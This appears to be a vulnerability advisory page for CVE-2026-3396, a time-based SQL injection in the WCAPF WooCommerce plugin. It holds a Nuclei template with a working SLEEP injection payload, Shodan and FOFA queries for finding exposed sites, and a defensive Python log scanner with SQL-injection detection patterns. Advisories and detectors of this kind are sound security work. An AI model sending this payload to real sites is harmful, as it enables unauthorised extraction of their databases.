WCAPF WooCommerce Ajax Product Filter - SQL Injection
CVE-2026-3396
Verified
Description
WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
Severity
High
CVSS Score
7.5
Exploit Probability
23%
Published Date
April 14, 2026
Template Author
theamanrawat
CVE-2026-3396.yaml
id: CVE-2026-3396

info:
  name: WCAPF WooCommerce Ajax Product Filter - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
  impact: |
    Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality.
  remediation: |
    Update to a version later than 4.2.3 or the latest available version.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3396
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-3396
    epss-score: 0.22856
    epss-percentile: 0.95968
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'http.html:"/wp-content/plugins/wc-ajax-product-filter/"'
    fofa-query: 'body="/wp-content/plugins/wc-ajax-product-filter/"'
  tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
        internal: true

      - type: word
        words:
          - "WCAPF"
          - "WooCommerce Ajax Product Filter"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "No results found")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220348bb98c28b254d5d371ae8b2d6eb29c69913058cac832fecf84db5c88e4846c0220275ab2124a8ca00fde9e9ee08fab9ce6c755b249527728202e18a67384563738:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2026-3396
CWE ID:
CWE-89
Remediation Steps
Update to a version later than 4.2.3 or the latest available version.
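Until the plugin is updated, sites can at least spot the probe the template above sends in their access logs. The following Python scanner is an added, defender-side example (not part of the Nuclei template or of the plugin's own code): it assumes Apache/Nginx combined log format and flags requests whose filter_post_author value carries a time-delay function or a quote-then-AND/OR fragment; the log lines are constructed.

```python
"""Flag time-based SQL injection probes aimed at the WCAPF filter_post_author parameter.

Added defender-side example; it is not part of the Nuclei template or of the plugin.
Assumes Apache/Nginx combined log format; all sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query-string parameter the advisory identifies as insufficiently escaped.
SUSPECT_PARAM = "filter_post_author"

# Delay functions used by time-based probes, plus a quote followed by AND/OR,
# which also covers boolean variants. Tune against your own traffic for false positives.
SQLI_RE = re.compile(r"(?i)\b(sleep|benchmark|pg_sleep|waitfor)\s*\(|'\s*(and|or)\s+")


def is_sqli_probe(target: str) -> bool:
    """True when the request target carries a suspicious filter_post_author value."""
    query = urlsplit(target).query
    for raw in parse_qs(query, keep_blank_values=True).get(SUSPECT_PARAM, []):
        # parse_qs already decoded once; decode again to catch double-encoded payloads
        value = unquote_plus(raw)
        if SQLI_RE.search(value):
            return True
    return False


def scan_log(lines):
    """Return (ip, time, target) for every log line that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_sqli_probe(m.group("target")):
            hits.append((m.group("ip"), m.group("time"), m.group("target")))
    return hits


# Constructed sample traffic: one benign filter, one probe, one readme fingerprint fetch.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Apr/2026:10:02:11 +0000] "GET /shop/?filter_post_author=12&orderby=price HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Apr/2026:10:02:15 +0000] "GET /shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Apr/2026:10:03:40 +0000] "GET /wp-content/plugins/wc-ajax-product-filter/readme.txt HTTP/1.1" 200 2048 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, when, target in scan_log(SAMPLE_LOG):
        print(f"{when} {ip} probed {target}")
```

Pair a hit with a server-side response time near the injected delay (6 seconds in the template) to separate a real time-based probe from a scanner that merely sent the string.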